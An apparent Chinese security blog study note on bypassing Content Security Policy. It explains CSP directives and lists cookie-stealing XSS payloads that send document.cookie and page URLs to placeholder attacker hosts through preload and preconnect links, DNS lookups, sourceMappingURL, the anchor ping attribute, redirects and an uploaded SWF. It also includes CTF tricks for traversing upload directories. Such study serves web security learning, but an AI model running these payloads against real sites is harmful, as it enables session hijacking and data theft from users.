bypass csp学习

csp学习

环境测试：

2016年11月27日。
chrome 版本 54.0.2840.98 (64-bit)
firefox 版本 50.0

csp

csp是为了缓解一些攻击，比如xss、csrf。
以白名单的机制对网站加载或执行的资源起作用，通过 HTTP 头信息或者 meta 元素定义

这样就导致xss失效。

更多基础知识可以看看这篇文章：

http://lorexxar.cn/2016/08/08/ccsp/

csp编写网站：
http://cspisawesome.com/

主要是总结一下如何bypass

bypass csp

xxxx-src *

header("Content-Security-Policy: script-src *;");

*符号表示允许除了内联函数以外所有的url式的请求，这样可以通过src引用。

既然想用csp的人...可能一般不会这么设置，最多问题是出在frame-src *，这样同源问题导致不能xss(绕过同源另说)，但是还是能进行csrf的。

script-src unsafe-inline

header("Content-Security-Policy: default-src 'none';script-src http://lemon.love/test/csp/ 'unsafe-inline';");

如果加上unsafe-inline，就不会阻止内联代码。＝。＝，

内联代码包括：<script>块内容，内联事件，内联样式

比如想加载http://love.lemon/1.js，但是只限制在http://lemon.love/test/csp/里。

但是可以执行内联脚本。

default-src 'none'为none，也就其他的加载不进来，无法讲数据发送出去。虽然为none可以导致xss数据没法利用，但是网站估计也不能正常运行了。

xxxx-src self

self表示的是同源的url，所以貌似没啥办法可以加载远程url来获取数据。

header("Content-Security-Policy: default-src 'self';script-src http://lemon.love/test/csp/ 'unsafe-inline';style-src 'self' 'unsafe-inline'; img-src 'self'");

1、通过预加载

在 HTML5 中的一个新特性：页面资源预加载，他是浏览器提供的一个技巧，目的是让浏览器在空闲时间下载或预读取一些文档资源，用户在将来将会访问这些资源。一个Web页面可以对浏览器设置一系列的预加载指示，当浏览器加载完当前页面后，它会在后台静悄悄的加载指定的文档，并把它们存储在缓存里。当用户访问到这些预加载的文档后，浏览器能快速的从缓存里提取给用户。

可分为：DNS-prefetch、subresource 和标准的 prefetch、preconnect、prerender

<!-- 预加载某个页面 -->
<link rel='prefetch' href='http://xxxx'><!-- firefox -->
<link rel='prerender' href='http://xxxx'><!-- chrome -->
<!-- 预加载某个图片 -->
<link rel='prefetch' href='http://xxxx/x.jpg'>
<!-- DNS 预解析 -->
<link rel="dns-prefetch" href="http://xxxx">
<!-- 特定文件类型预加载 -->
<link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->

经过测试：目前chrome还没对预加载进行处理，firefox有进行处理，prefetch已不可用，但是dns预解析还是能用的。

如果能够进行unsafe-inline的话，可以这样构造来获取数据。

chrome(http通道)：

var n0t = document.createElement("link");n0t.setAttribute("rel", "preload");n0t.setAttribute("href", "//ipipipip/"+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})()));document.head.appendChild(n0t);

firefox(dns通道):

dc = document.cookie;dcl = dc.split(";");n0 = document.getElementsByTagName("HEAD")[0];for (var i=0; i<dcl.length;i++){console.log(dcl[i]);n0.innerHTML = n0.innerHTML + "<link rel=\"preconnect\" href=\"//" + escape(dcl[i].replace(/\//g, "-")).replace(/%/g, "_") + '.' + location.hostname.split(".").join("") +  ".xxx.io\">";}

不是所有的页面都能够被预加载，当资源类型如下时，讲阻止预加载操作：

URL中包含下载资源
页面中包含音频、视频
POST、PUT和DELET操作的ajax请求
HTTP认证
HTTPS页面
含恶意软件的页面
弹窗页面
占用资源很多的页面
打开了chrome developer tools开发工具

2、其他特性
jQuery sourcemap

document.write(`<script>
//@ 	   sourceMappingURL=http://xxxx/`+document.cookie+`<\/script>`);

a标签的ping属性

a=document.createElement('a');
a.href='#';
a.ping='http://xxx.io/?' + escape(document.cookie);
a.click();

http 204

location='//xxx.io/csi?' + escape(document.cookie);

文件上传的助攻

如果没有unsafe-inline的助攻，而且都是self的话，这样也只能寻求站内的上传点。

cctf 2016：

上传的swf内容：

CWS
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://xss.xxxxx.cc', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send('cookie='+document.cookie); </script>

<link rel='import' href='/upload/xxxxx'>

上传后的文件也分目录，比如上传到upload目录，但是如果csp限制是只能在static目录下加载js。
比如hctf 2016：

Content-Security-Policy: default-src 'self'; script-src http://sguestbook.hctf.io/static/ 'sha256-n+kMAVS5Xj7r/dvV9ZxAbEX6uEmK+uen+HZXbLhVsVA=' 'sha256-2zDCsAh4JN1o1lpARla6ieQ5KBrjrGpn0OAjeJ1V9kg=' 'sha256-SQQX1KpZM+ueZs+PyglurgqnV7jC8sJkUMsG9KkaFwQ=' 'sha256-JXk13NkH4FW9/ArNuoVR9yRcBH7qGllqf1g5RnJKUVg=' 'sha256-NL8WDWAX7GSifPUosXlt/TUI6H8JU0JlK7ACpDzRVUc=' 'sha256-CCZL85Vslsr/bWQYD45FX+dc7bTfBxfNmJtlmZYFxH4=' 'sha256-2Y8kG4IxBmLRnD13Ne2JV/V106nMhUqzbbVcOdxUH8I=' 'sha256-euY7jS9jMj42KXiApLBMYPZwZ6o97F7vcN8HjBFLOTQ=' 'sha256-V6Bq3u346wy1l0rOIp59A6RSX5gmAiSK40bp5JNrbnw='; font-src http://sguestbook.hctf.io/static/ fonts.gstatic.com; style-src 'self' 'unsafe-inline'; img-src 'self'

可以通过%2f跨目录这种来加载：

<scscriptript src="http://sguestbook.hctf.io/static/..%2fupload/a32642750cae25f4c5b020d9a66c5c5c"></scscriptript>

这里要注意到点就是，js里面的内容，虽然可以执行js了，但是获取数据还是要依靠前面的那些技巧，而不是js平台那些new Images等一些方式，不然受限制。

参考链接

http://lorexxar.cn/2016/08/08/ccsp/
http://paper.seebug.org/91/
https://blog.0daylabs.com/2016/09/09/bypassing-csp/
http://dogewatch.github.io/2016/11/01/By-Pass-CSP/